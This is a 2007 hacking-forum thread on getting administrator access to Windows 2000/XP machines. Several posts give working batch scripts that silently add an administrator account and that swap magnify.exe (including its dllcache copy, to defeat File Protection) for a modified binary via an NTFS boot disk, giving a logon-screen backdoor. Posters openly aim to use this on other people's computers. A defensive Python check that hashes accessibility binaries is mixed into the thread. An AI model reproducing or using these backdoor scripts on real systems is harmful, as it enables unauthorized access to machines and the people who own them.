djhiran Posted June 21, 2007
No hard work to be done to gain access to NTFS partitions of XP with WinHex!!!
detox420 Posted July 8, 2007
So how would I be able to integrate this with Switchblade on my U3?
GonZor Posted July 9, 2007
Quoting detox420: "So how would I be able to integrate this with Switchblade on my U3?"
Which part? Reading through the thread, there is a lot of information here.
detox420 Posted July 19, 2007
Well, the part where you can silently put a hidden admin account on the computer it is being used on. I KNOW it's possible because my good friend has done it, but he refuses to give out the code for it.
Xqtftqx Posted July 28, 2007
I don't know if somebody already said this above; I don't have all day to read this. You can easily do this with batch:

rem create the user "Bob" with password "Bobby", then put him in the local Administrators group
net user Bob Bobby /add
net localgroup Administrators Bob /add

Put that in a batch file and run it on the computer. It will make a user account "Bob" with the password "Bobby", and then you've got an administrator account. You can make one to remove it as well:

net user Bob /delete

There you go, have fun.
SomeoneE1se Posted July 28, 2007
Again, you already have to have administrator access to do that!
Joerg Posted July 28, 2007
I set up a bootdisk with ntfs4dos to copy a compiled batch into the system32 folder (as magnify.exe). By pressing {Win}+{U} and starting the magnifier you have an administrator account. This does not require administrator rights, but it needs physical access.
kickarse Posted August 9, 2007
Perhaps we should outline our basic plan of action. It seems we all need the following:
1. Find an exe/dll hook that Windows uses in an administratively privileged state AND that can be modified/saved/edited/run by Guest or Everyone.
2. Get that exe to be loaded by Administrator and/or SYSTEM AND spawn/run our extra code/payload that adds a user and password or escalates Guest to Administrator access.
3. Finally, and not really needed, replace the fixed exe with the normal exe to remove the trace.
Does magnify.exe have the ability to be modified by Guest or Everyone??
mexxus Posted August 9, 2007
Hmmmm. Interesting work... I wonder if Microsoft will block access to exes if they find out, but they can't, can they? Otherwise Windows won't load, and they can't block you from running the neat appy, as it is part of Windows, but domain admins could put it in the block list. Usually accounts, even those on a domain, have access to C:. Since utilman.exe isn't really a core appy, it isn't as highly protected as others and isn't always running, so good choice there Microsoft......... Sounds interesting, but lethal... I have tried the net commands in Vista Home Premium and they don't work on my account (though it's admin, but Vista and admin are two different things... "are you sure you wanna run that... access denied"... but I chose my account to be an admin... too bad). I'm sure this would work even in a limited account (so long as there's access to C:).
mexxus
Joerg Posted August 9, 2007
@kickarse: magnify.exe is a system file, so replacing it is only possible by an administrator (or a person having admin rights) or by booting from another OS. But it can be started by everyone. The difficult part is that you need admin rights instantly and not the dirty way by booting another operating system.
EDIT: http://oxid.netsons.org/phpBB2/viewtopic.php?p=4578
To make a long story short, you create a service which calls cmd.exe with SYSTEM rights. To prove that you have SYSTEM rights, you can change into the System Volume Information folder. But as always, you need admin rights.
Leapo Posted August 16, 2007
Wouldn't be that hard, really. All that's required is a DOS boot floppy (or CD) with an NTFS driver that automatically runs a batch file that replaces magnify.exe with your modified version.
Insert floppy (or bootable CD) > boot machine > script runs > reboot into Windows > use exploit
Edit: Here's all the code that's required for the batch file:

rem keep a backup of the real magnify.exe, then drop the modified one in its place
copy C:\WINDOWS\system32\magnify.exe C:\WINDOWS\system32\magnify_bak.exe
del C:\WINDOWS\system32\magnify.exe
copy .\magnify.exe C:\WINDOWS\system32\
exit

And this will undo it:

rem restore the backup over the modified copy and remove the backup
del C:\WINDOWS\system32\magnify.exe
copy C:\WINDOWS\system32\magnify_bak.exe C:\WINDOWS\system32\magnify.exe
del C:\WINDOWS\system32\magnify_bak.exe
exit

Yes, I know I could have used "ren" instead of "copy" and "del", but I've had issues doing it that way without actually changing to the working directory. This will work for sure.
Joerg Posted August 16, 2007
Ehm, I actually did that some time ago ;)

@echo on
rem find the drive that holds ntldr, then the Windows directory on that drive
FOR %%i IN (A B C D E F G H I J K L M N O P Q R S T U V W X Y Z) DO IF EXIST %%i:\ntldr SET SYS=%%i
FOR %%a IN (windows winnt) DO IF EXIST %SYS%:\%%a\system32\winlogon.exe SET WIN=%%a
rem overwrite the dllcache copy as well, so Windows File Protection has nothing clean to restore from
copy ".\magnify.exe" "%SYS%:\%WIN%\system32\dllcache\magnify.exe" /Y
copy ".\magnify.exe" "%SYS%:\%WIN%\system32\magnify.exe" /Y

This does work on 2k and on XP, and I set up a bootdisc with ntfs4dos, look here.
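A check a defender would want after reading the two scripts above, as an added example that is not from this thread: compare the live accessibility binaries in system32 with their dllcache copies and with a known-good hash list. The directory layout, file contents and hashes in the demo are constructed; on a real XP box you would point system32 at C:\WINDOWS\system32 and take the known-good hashes from install media or a trusted host. The dllcache comparison alone catches Leapo's swap but is defeated by Joerg's script, which overwrites both copies, so the known-good list is the comparison that actually matters.

```python
"""Integrity check for XP-era accessibility binaries (added example)."""
import hashlib
import os
import tempfile

# Binaries that can be launched from the logon screen (Win+U, Shift x5, ...)
ACCESSIBILITY_BINARIES = ("magnify.exe", "utilman.exe", "sethc.exe", "osk.exe", "narrator.exe")


def sha256_of(path):
    """Stream a file through SHA-256 and return the hex digest."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 16), b""):
            digest.update(chunk)
    return digest.hexdigest()


def check_accessibility_binaries(system32, known_good=None, names=ACCESSIBILITY_BINARIES):
    """Return {name: [findings]}; an empty list means the binary looks clean.

    Two independent comparisons per binary:
      * live file vs. the dllcache copy that File Protection restores from
        (catches a swap of system32 alone);
      * live file vs. a known-good hash from install media or a trusted host
        (needed when both copies were overwritten, as Joerg's script does).
    """
    known_good = known_good or {}
    dllcache = os.path.join(system32, "dllcache")
    findings = {}
    for name in names:
        live = os.path.join(system32, name)
        if not os.path.isfile(live):
            findings[name] = ["missing"]
            continue
        issues = []
        live_hash = sha256_of(live)
        cached = os.path.join(dllcache, name)
        if os.path.isfile(cached) and sha256_of(cached) != live_hash:
            issues.append("differs from dllcache copy")
        if name in known_good and known_good[name] != live_hash:
            issues.append("does not match known-good hash")
        findings[name] = issues
    return findings


def build_demo_layout():
    """Constructed sample tree (not a real system32): one clean binary, one
    swapped in system32 only, one swapped in both places. Returns
    (system32_path, known_good_hashes)."""
    root = tempfile.mkdtemp(prefix="sys32demo_")
    dllcache = os.path.join(root, "dllcache")
    os.mkdir(dllcache)
    original = {
        "magnify.exe": b"MZ-magnify-original",
        "utilman.exe": b"MZ-utilman-original",
        "sethc.exe": b"MZ-sethc-original",
    }
    payload = b"MZ-cmd.exe-in-disguise"  # stands in for the modified binary
    for name, body in original.items():
        for directory in (root, dllcache):
            with open(os.path.join(directory, name), "wb") as fh:
                fh.write(body)
    # Leapo-style swap: system32 copy only
    with open(os.path.join(root, "utilman.exe"), "wb") as fh:
        fh.write(payload)
    # Joerg-style swap: system32 and dllcache copies
    for directory in (root, dllcache):
        with open(os.path.join(directory, "sethc.exe"), "wb") as fh:
            fh.write(payload)
    known_good = {n: hashlib.sha256(b).hexdigest() for n, b in original.items()}
    return root, known_good


if __name__ == "__main__":
    sys32, good = build_demo_layout()
    for binary, issues in check_accessibility_binaries(sys32, good, tuple(good)).items():
        print(f"{binary}: {', '.join(issues) or 'clean'}")
```

Running the demo flags utilman.exe on both comparisons, flags sethc.exe only on the known-good hash, and reports magnify.exe as clean; a binary that is absent is reported as missing rather than silently skipped.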
Anthrax Posted August 20, 2007
What can I use to make an NTFS bootable CD? I've only got a Win98 boot CD.
Joerg Posted August 20, 2007
I used ntfs4dos, but I'm sure there are better solutions. You format the disc using the ntfs4dos program and copy the files of bootdisc.zip onto the disc.
// note to myself: read
Anthrax Posted August 20, 2007
Figured that part. Anyone got an image or something of an NTFS boot CD?
ihackwindows Posted August 23, 2007
Too long to read it all, so I would say you could make a program that copies the files over quickly without a prompt (I use C++), then reboots your computer.
Joerg Posted August 23, 2007
By the way, I tested the system file protection of Windows XP. I replaced the files and hit reset on my virtual machine. After that, the files were still there (replaced). Can someone confirm this?
GonZor Posted August 24, 2007
Quoting Joerg: "Can someone confirm this?"
It may have something to do with the lack of sleep, but your post didn't quite make sense to me... If you're asking whether the "fake" files will still be there on reboot, yes; I think someone stated earlier in this thread that Windows only checks for the files' existence, not the integrity of the file.
Joerg Posted August 24, 2007
Yeah, I love posting nonsense ;) I meant that Windows didn't replace the patched files after a forced reboot, but I think it's because I deactivated SFC on my VM, so never mind and ignore this and my last post.
Leapo Posted August 25, 2007
Quoting Joerg: "Ehm, I actually did that some time ago ;)" (script quoted above)
That works, but isn't it a tad bloated and overcomplicated? The way I wrote it up doesn't need to search every drive in the system to work...
Joerg Posted August 25, 2007
Yes, your script works for all standard XP/Vista machines. My script works for all 2000/XP/Vista systems installed on another partition than C:. For me it is more important to make the script work on any PC (running Windows).
XtremeModifier Posted September 12, 2007
Cool... I am going to have to try these methods on one of the many ""Personal"" systems. Currently I have used live Linux tools to change the admin password for 2000 and XP, and then I am in, in about 3 minutes or so. Great for users who lock themselves out of their own systems.. ha ha
K1u Posted September 12, 2007
Quoting Joerg: "Yes, your script works for all standard XP/Vista machines. My script works for all 2000/XP/Vista systems installed on another partition than C:. For me it is more important to make the script work on any PC (running Windows)."
Could you not just use %systemdrive%?
GonZor Posted September 13, 2007
Quoting K1u: "Could you not just use %systemdrive%?"
That's only if you want to make it simple... or to simplify it further just use %systemroot% :-P
Joerg Posted September 13, 2007
Ehm, if you try this you'll get some nice errors ;) I'm booting from a DOS floppy, so I don't have system variables. If it were so easy, I would have done this. A problem I spotted is that if someone has more than just one Windows NT system installed, the script just copies it once.